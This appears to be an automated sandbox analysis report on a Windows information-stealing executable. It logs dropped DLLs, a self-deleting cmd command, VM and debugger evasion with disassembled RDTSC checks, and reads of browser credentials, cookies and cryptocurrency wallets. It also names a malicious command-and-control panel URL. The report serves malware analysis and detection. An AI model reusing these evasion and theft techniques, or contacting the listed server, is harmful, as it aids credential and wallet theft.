Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'			Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	RDTSC instruction interceptor: First address: 0000000002308D60 second address: 0000000002308D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	RDTSC instruction interceptor: First address: 0000000002308DC6 second address: 0000000002308DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	RDTSC instruction interceptor: First address: 0000000000568D60 second address: 0000000000568D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	RDTSC instruction interceptor: First address: 0000000000568DC6 second address: 0000000000568DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00401B77 mov ebx, dword ptr fs:[00000030h]	0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402D9F mov ebx, dword ptr fs:[00000030h]	0_2_00402D9F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023082BA mov eax, dword ptr fs:[00000030h]	0_2_023082BA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023096CC mov eax, dword ptr fs:[00000030h]	0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230892B mov eax, dword ptr fs:[00000030h]	0_2_0230892B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02303519 mov eax, dword ptr fs:[00000030h]	0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304147 mov eax, dword ptr fs:[00000030h]	0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023061E9 mov eax, dword ptr fs:[00000030h]	0_2_023061E9

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process queried: DebugPort			Jump to behavior

Source: Yara match	File source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.935788645.000000001FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935761857.000000001FEF8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X4lLneI8ZK.exe PID: 1012, type: MEMORYSTR

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\			Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.36.14	drive.google.com	United States	15169	GOOGLEUS	false
31.210.20.16	smdglo.xyz	Netherlands	61157	PLUSSERVER-ASN1DE	true
142.251.36.1	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Windows Analysis Report X4lLneI8ZK.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0g-b4-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download	false		high
http://smdglo.xyz/panel/index.php	false	Avira URL Cloud: safe	unknown

ID:	479789
Product:	CloudBasic
Start time:	14:14:01
Start date:	08.09.2021
Sample:	X4lLneI8ZK.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4103a2b04ede0d36e5079f6799cdfa14
SHA1:	23b477810f258963e62458ed02e82c58c8c00adc
SHA256:	b923011216d37106f2f497f12097ecd3412caca89edee1a49e8090b94344a310
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\15579640113785474122617.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\155798431212290458032209.tmp	SQLite 3.x database, last written using SQLite version 3032001	EA7F9615D77815B5FFF7C15179C6C560	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
C:\Users\user\AppData\Local\Temp\155799377831211675675246.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\155799843460763056844440.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\15580343386379626644637.tmp	SQLite 3.x database, last written using SQLite version 3032001	89CE01DCB0DC182AFF651E0094A2A7A2	DBFC15F5503780095741421FCC662D72460D804A	1A0599ED2576D1224FDE5E4B512BF36AA0D322765C8F83ADDF9487D6D4E511E0
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	502263C56F931DF8440D7FD2FA7B7C00	523A3D7C3F4491E67FC710575D8E23314DB2C1A2	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	CB978304B79EF53962408C611DFB20F5	ECA42F7754FB0017E86D50D507674981F80BC0B9	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	88FF191FD8648099592ED28EE6C442A5	6A4F818B53606A5602C609EC343974C2103BC9CC	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6D778E83F74A4C7FE4C077DC279F6867	F5D9CF848F79A57F690DA9841C209B4837C2E6C3	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
